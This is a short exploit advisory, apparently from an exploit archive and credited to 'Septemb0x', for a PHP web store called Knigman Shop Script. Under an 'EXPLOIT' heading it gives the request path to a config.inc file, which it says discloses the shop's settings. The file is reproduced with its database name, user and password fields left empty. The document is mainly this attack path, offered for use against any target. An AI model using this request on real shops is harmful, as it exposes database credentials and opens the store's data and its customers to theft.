< ------------------- header data start ------------------- >
#############################################################
# Application Name : Knigman Shop Script
# Vulnerable Type : Arbitrary Database Config Disclosure Vulnerability
# Infection : SQL Info Get...
# author : Septemb0x
# Script Down.& WebSite : http://knigman.net/buy.php?tovid=22764 & http://s2.dosya.tc/knigman.zip.html
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
EXPLOIT :
http://target/path/config.inc
GET TO;
<?
$ashopname = ;
$ashopphone = ;
$ashopemail = ;
$ashopaddress = ;
$ashopurl = ;
$databasename = ;
$databaseuser = ;
$databasepasswd = ;
$orderrecipient = ;
$ordersubject = ;
$timezoneoffset = ;
$affiliateinfo = ;
$affiliaterecipient = ;
?>
< -- bug code end of -- >